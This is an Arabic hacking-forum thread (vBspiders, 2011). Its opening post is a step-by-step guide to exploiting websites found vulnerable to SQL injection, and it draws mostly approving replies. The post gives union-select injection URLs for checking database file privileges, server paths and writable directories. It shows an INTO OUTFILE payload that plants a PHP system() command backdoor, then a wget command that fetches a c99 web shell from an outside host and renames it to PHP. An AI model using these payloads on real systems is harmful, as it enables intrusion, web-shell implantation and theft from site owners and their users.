التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-11-2011, 03:29 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

.................... دليـــل المخترق: ماتفعل بعد معـــرفة [موقع] مصاب بثغـــرات ::SQL Injection::






"اهلا وسهلا بكم اعضاء شبكة العناكب الاحترافية"


اليوم موضعي ماتفعل بعد ماتجد موقع مصاب بلــثغرات
:: SQL In Jection::
طبعا كثرت ثغرات الحقن وكثرت أنواعها اليوم حبيت ان انزل موضوع جديد بسبب قلة نشاطي في هذة الايام
والسبب معروف هو المدرسة
وحبيت ان يستفاد المتدى وحتى المتوسط من هذا الوضوع
وبدون مقدمة طوية نبدأ بالموضوع..’

في البداية سوف ينقسم الموضوع الى :
أ-الاختراق العادي والحقن عن طريق الاومر
ب-الاختراق العادي والحقن عن طريق البرامج
ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية
1-ماتحتاج من أجل هذة الخطوة

اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege
ثانيا : لمعرفه هل الماجيك كوتس of &on
ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن
رابعا : طرق معرفه المجلدات المصرحه
2- بدأ الاستغلال وتلغيم الموقع ورفع الشل

بسم الله ونتوكل على الله ,
أ-الاختراق العادي والحقن عن طريق الاومر
في البداية الحقن العادي يتم فية اخذ الموقع المصاب وتبدأ انتة تحقن وطبعا الحقن
وطبق الأومر الخاصة بلقاعدة المصابة بلسكريب المنصب على الموقع

طيب احنة في منتدى دورة خاصة لثغرات sql
وهذا الرابط الدورة .
كود PHP:
http://vbspiders.com/vb/forumdisplay.php?f=236 
</b>

ب-الاختراق العادي والحقن عن طريق البرامج
يتم هنا الاختراق الموقع المصاب بلثغرات الحقن عن طريق برامج والحقيقة البرامج جميلة وقوية بنفس الوقت وانة دائما اعتمد عليها طبعا لان
لحقن باليد متعب لكن يجب ان تتعلم ماهية دينامكية الاختراق عن طريق ثغرات sql
نبدأ بأقوى برنامج هو برنامج
havij 1.14

كود PHP:
http://itsecteam.com/en/projects/project1_page2.htm 
</b>

لتحميل البرنامج اضغطو على
Havij v1.14 Free

طيب شرح البرنامج في هذا الفديوا :
* فحص الموقع اذا هو مصاب او لا
* استخراج الجداول واختيار الجدول الهدف [ الادمن او اليوزر ] على حسب النتائج
* استخراج اعمدة الجدول الهدف
* استخراج بيانات العمود الهدف
* فك الباسوورد المشفر بمقياس MD5
* استخراج مسار لوحة تحكم الادمن
* دخول لوحة التحكم


كود PHP:
http://www.mediafire.com/?776x2axz39pku8l 
</b>


ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية
في هذة المرحلة سوف يتم الى رفع الشل عن طريق ثغرات sql
وطبعا هون لازم تستخدم عقلك شوية وتنتبة لان هذة المرحلة جميلة جدا وقوى حيث مواقع المصاب بلثغرات الحقن كثير اكثر من شعر راسي ولازم تستخدم عقلك في الوصول الى نقاط ضعفها ورفع شل .
يوجد اثنين من التعليمات اسمهما
into outfile & into dumpfile
في هذا التعليمين
السابقتان في لغة القواعد لحفظ محتوى جدول داخل ملف
وكلتا التعليمتان تؤدي نفس الغرض بمعنى ايهما استخدمت بتقضى حاجتك
وعن طريقها نقدر نحقن كود ملغم بثغره او مركز رفع صغير او نعدل بيانات..

1-ماتحتاج من أجل هذة الخطوة
سوف يبدأ العمل ألجد ونبدأ الاستغلال الثغرات طبعا الاستغلال الحقيقي ...
وبجب ان تنبة في هذة الخطوات ..
طلعا الخطوات راح نبدأ بها ونشرحها واحدة وحدة
والخطوات هي /
1- لديك تصريح للتعامل مع الملفات
2- معرفة هل الماجك كوتس اوف ام أون
3- معرفة مسارك على السيرفر
4- معرفة مجلد مصرح بلتصريح 777
5- بدأ الاستغلال وتلغيم ورفع الشل

اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege
طيب شو هذا التصريح !
هذا
FILE privilege
يعني تصريح التعامل مع الملفات من خلال القواعد
او ملف الامتياز لمستخدم القاعده و اذا كنت تملك هذا التصريح يعني انك تملك كتابه ملفات ولديك ملف امتياز وبا التالي تحقن شل او كود

كيف نعرف ان لدينا هذا التصريح ؟
اولا نعرف اصدار القاعدة عن طريق أمر
كود PHP:
 "version()" 
</b>
كود PHP:
http://virus.com/vq.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9-- 
</b>
المواقع لي تستخدم قاعدة بيانات
الاصدار mysql 5
يوجد جدول اسمه
user_privileges
العمود
is_grantable
وفي هذا الجدول تجد
نشوف هل هل لدينا صلاحيه او اذن لحقن شل او كتابة ملف بستخدام هذا العامود
كافة الامتيازات للمستخدم القاعده
او نقدر نقول ان في هذا الجدول
كافة الصلاحيات للمستخدم القاعده

لذلك نستخدم الامر التالي لمعرفة ان لدينا هذا التصريح ,

كود PHP:
http://virus.com/vq.php?id=-10+union+select+1,is_grantable,3,4,5,6,7,8,9+from+information_schema.user_privileges-- 
is_grantable ( في حال نبي نحقن كود لازم يكون نعم اي مسموح لي با الكتابه امتيازات المستخدم وهو يعني هل لديك
grantee وهو يعني اسم مستخدم قاعدة البيانات
privilege_type تحديدا وهو يعني المسموح لك كمستخدم للقاعده ماهو
طيب اذا طلع لنا
YES
اذان لدينا هذا التصريح

يعني نقدر نحقن كود ان شاء الله
ونمتلك امتيازات المستخدم للكتابه

........
طيب
في الاصدار الرابع
mysql 4
كيف اعرف ان لدي امتيازات لمستخدم القاعده او كيف اعرف انه استطيع ان احقن شل او اكتب كود
نجرب نعمل نفس الطريقه با الاصدار الخامس على الاصدار الرابع لكن بشكل مختلف
اول شي عامود ملف الامتياز في الاصدار 4
file_priv

يعني هل لديك صلاحيه او اذن لكتابه file_priv

وراح يكون يا نعم او لا اي تملك التصاريح او لا تملك او تملك الامتياز او لا تملك او يمكنك كتابه كود او لا يمكنك
نشوف
كود PHP:
http://www.virus.com/vq.php?id=-10+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
</b>
اذا طلع لنا
Y
يعني نقدر نحقن او نكتب كود


ثانيا : لمعرفه هل الماجيك كوتس of &on

يوجد لدينا طريقتين
الطريقه الاولى
عن طريق دالة :
load_file('/')
مثال
كود PHP:
http://www.virus.com/vq.php?id=2+union+select+1,load_file('/') ,3,4,5,6,7-- 
</b>
لو اعطى خطا يعني اون لو ما اعطى يعني اوف

الطريقه الثانيه
'1'='1'--
لو طلع خطا او وجت في الصفحه التالي
\'1\'=\'1\'
هذا يعني الماجيك اون لو ما طلع لي مثل اللرمز فوق يعني اوف
مثال
كود PHP:
http://www.virus.com/vq.php?story=2 '1'='1'-- 
</b>


ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن
طبعا لازم نعرف المسار لي احنة فية لازم حتى نشوف مجلد مصرح مشان نقدر نحقن او نكتب ملف خبيث

لديك عدة طرق
اولا
نحاول نطلع اخطاء
المهم انت وطريتقك تحاول تجيب مسارات او اخطاء
وايظا يمديك تروح تضع الموقع في قوقل وتحاول تطلع اخطاء ومسارات
يوجد طرقة لمعرف المسار في الأصدار الخامس
نستخدم
@@datadir
او نجرب نطلع اخطا
جرب التالي
0***8242; AND 1=’0
ماطلع مسار
or
'1'='1'
ايظا ما راح يطلع
يعني تجرب وتحاول تعرف المسارات
او نروح قوقل مثلا نشوف الاخطاء
site:virus.com

رابعا : طرق معرفه المجلدات المصرحه

باقي علينا نجيب مجلدات مصرحه 777 عشان نقدر نحقن
يوجد عدة طرق لاكن راح اذكر الطرق المهمة والقوية وانتة جرب بعد واستخدم عقلك وطرقك في الاختراق ..
أولا
لدي هذا المجدات لي وجدتها وان شاء الله تفيدكم ويتكون على الاغلب مصرحة بـــ 777
http://virus.com/templates_compiled/
http://virus.com/templates_c/
http://virus.com/templates/
http://virus.com/temporary/
http://virus.com/images/
http://virus.com/temp/
http://virus.com/files/


ثانيا
يوجد برنامج
IntelliTamper
في هذا البرنامج تستطيع اظهار جميع المجدات في السيرفر ولة شروحات كثيرة في النت
في طرق كثيرة ايظا جرب وتشوف وأبحث ولاتكون كسول ’
..........
وتجرب تحقن على المجلدات حتى يضبط معك واحد مصرح
777
كيف اعرف انه مصرح هذا بتعرفه لمن بيحقن معك الكود فقط
اذا لم يحقن يعني مش مصرح او احيان بيطلع لك كتابه بتقول لك
Can't create/write to file

2- بدأ الاستغلال وتلغيم الموقع ورفع الشل

طيب لي فهمنا لي فوق يجب ان يكون لديك /
1-يجب ان يكون لديك اذن او صلاحيه كمستخدم للقاعده للكتابه
2-يجب ان يكون الماجيك كوتس اوف
3-يجب ان تعرف المسارات حتى تقدر تحقن او تقرى ملفات
4-يجب ان يكون لديك مجلدات مصرحه777
الان نستخدم الامر التالي اذا كانت جميع الخيارات لي فوق صحيح وشغالة .
نحاول نلغم بكود بي اتش بي فيه ثغره كوماند او اي ثغره اخرى
كود PHP:
<?system($_get***91;"vq"***93;);?>
</b>
المتغير المصاب هو vqhackers
كود PHP:
http://www.virus.com/vq.php/id=-10+union+select+1,2,3,'<?system($_GET***91;"vq"***93;);?>',5,6,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php
'/*

طيب لي فوق نأتي ونحلل /
كود PHP:
http://www.virus.com/vq.php/id=-10 
</b>
الموقع المصاب

كود PHP:
,'<?system($_GET***91;"vq"***93;);?>',
</b>
الكود لتلغيم بثغراة تنفيذ الاومر cmd

كود PHP:
,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php'/* 
</b>
أمر لكتابة على ملف vbspiders.php
الموجود في المسار التالي ...
مع العلم ان مجلد hackers مصرح بتصريح
777

طيب الان نذهب الى ملف المصاب لي تم تلغيمة .
www.virus.com/hackers/vbspiders.php?vq=wget www.vbspiders.com/shell/c99.txt?;mv special.txt dd.php
ونفذ هذا الامر وشرح الامر.
كود PHP:
 www.virus.com/hackers/vbspiders.php?vq
</b>
مسار الملف المصاب بثغرات الكومند مع الدالة
"vq"
كود PHP:
wget www.vbspiders.com/shell/c99.txt 
</b>
أمر يقوم بسحب الملف الشل من أحد المواقع المرفوع عليها شل بصيغة نص
كود PHP:
mv c99.txt hih.php 
</b>
امر تحويل الشل من صيغة
txt >>> php
مع مراعة تغير اسمة الى
hih.php

ونفتح الشل لي رفع ويكون ع هذا المسار
كود PHP:
 www.virus.com/hackers/hih.php 
ويفتح معاك الشل بأذن الله

وهذا شرح لكيفية رفع الشل عن طريق هذة الثغرات .

كود PHP:
http://www.4shared.com/file/61186587/bfd39abe/into_outfile_by_hussin_X.html 
</b>



الحقوق / :rules:
ViRuS Qalaa
VBspiders TeaM

في أمان الله
أهداء الموضوع الى /
Cyber Code - Dr.NaNo - HaCkEr'S KiNg
مجروح هكر
والى جميع الاعضاء شبكة العناكب

ونلتقي دائما في مواضيع جديدة
SEE U




]gdJJJg hglojvr: lhjtug fu] luJJJvtm Fl,ruD lwhf feyJJJvhj ::SQL Injection::

التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس
قديم 04-11-2011, 07:29 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي


10/10 موضوع مميز جدا
باراك الله فيك
بالتوفيق لك

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 04-11-2011, 08:59 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
المفترس
:: مهووس الكمبيوتر ::
 
الصورة الرمزية المفترس
 

 

 
إحصائية العضو





المفترس غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المفترس is on a distinguished road

افتراضي


رائع اخي والله كنت ابحت عن معلومات زيادة عن هدا الامر وانت اتيت بها فلا يسعني الا ان ادعو الله لك ان يحفظك وينور دربك والله لا يحرمن من دروسك القيمة

التوقيع

Almoftarse over from here

تم ترك الهاكر والبرمجة وكل ما يخص الكمبيوتر لمدة عام

لا يوجد في هدا العالم صداقة الا صداقة الوالدين وبعدين صداقة العقل وبعدهما صداقة المال والنفود

 

   

رد مع اقتباس
قديم 04-11-2011, 09:34 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية MAZZ
 

 

 
إحصائية العضو








MAZZ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MAZZ is on a distinguished road

افتراضي


ما شاء الله على الشرح ممتاز ومشكور ياغالي بس انا محتاجك بخدمه بسيطه على المسن ياغالي distrust79@hotmail.com

   

رد مع اقتباس
قديم 04-11-2011, 10:14 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية ChucK NoRRis
 

 

 
إحصائية العضو







ChucK NoRRis غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ChucK NoRRis is on a distinguished road

افتراضي


جـــــازاك الله خيــــــرا

موضــــــوع مـمــــيز يــستـحـــق التــثــبـيـت

   

رد مع اقتباس
قديم 04-11-2011, 10:55 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية StaY AliVe
 

 

 
إحصائية العضو







StaY AliVe غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
StaY AliVe is on a distinguished road

افتراضي


جـــــازاك الله خيــــــرا

التوقيع

http://img197.imageshack.us/img197/8492/stayf.png

Warning : Dont Play With Me !!

My Email : KLJ@Hotmail.Fr

:666:

 

   

رد مع اقتباس
قديم 04-11-2011, 11:56 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية dr sow
 

 

 
إحصائية العضو






dr sow غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dr sow is on a distinguished road

افتراضي


جيد جدا اخي
في امان الله

   

رد مع اقتباس
قديم 04-13-2011, 12:06 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

افتراضي


مشكور شباب على الردود الرائعة
وأنتظروا الجزء الثاني من دليل المخترق ...
ويكون جزء احترافي بأذن الله
التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس
قديم 04-15-2011, 12:58 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو





الياس1245 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الياس1245 is on a distinguished road

افتراضي


مشكوووووووووووور يامعلم لي عودة

   

رد مع اقتباس
قديم 04-15-2011, 01:06 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي


+++++موضوع مميز جدا +++++
+++باراك الله فيك+++
+بالتوفيق لك+

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 04-15-2011, 02:52 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية BackCover
 

 

 
إحصائية العضو








BackCover غير متواجد حالياً

إرسال رسالة عبر MSN إلى BackCover

 

 

إحصائية الترشيح

عدد النقاط : 12
BackCover is on a distinguished road

افتراضي


merciii boucoup

   

رد مع اقتباس
قديم 04-25-2011, 08:39 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية abou anas
 

 

 
إحصائية العضو






abou anas غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
abou anas is on a distinguished road

افتراضي


باراك الله فيك

   

رد مع اقتباس
قديم 05-01-2011, 04:22 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية killerman
 

 

 
إحصائية العضو





killerman غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
killerman is on a distinguished road

افتراضي


مشكورررررررررررررررر موضوع مرتب ومنظم ومفيد ولكن اخى صعب تلاقى هدف بالشكل دا

   

رد مع اقتباس
قديم 05-15-2011, 09:43 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي


يــسلمو اخوي

بـــصراحه شــرح ممتاز

تقــبل مروري

اخــوك hank00sh

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 10-13-2011, 02:15 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو






احمد محمد حسن غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
احمد محمد حسن is on a distinguished road

افتراضي رد: دليـــل المخترق: ماتفعل بعد معـــرفة [موقع] مصاب بثغـــرات ::SQL Injection::


مشكور يا غالى

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 01:35 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0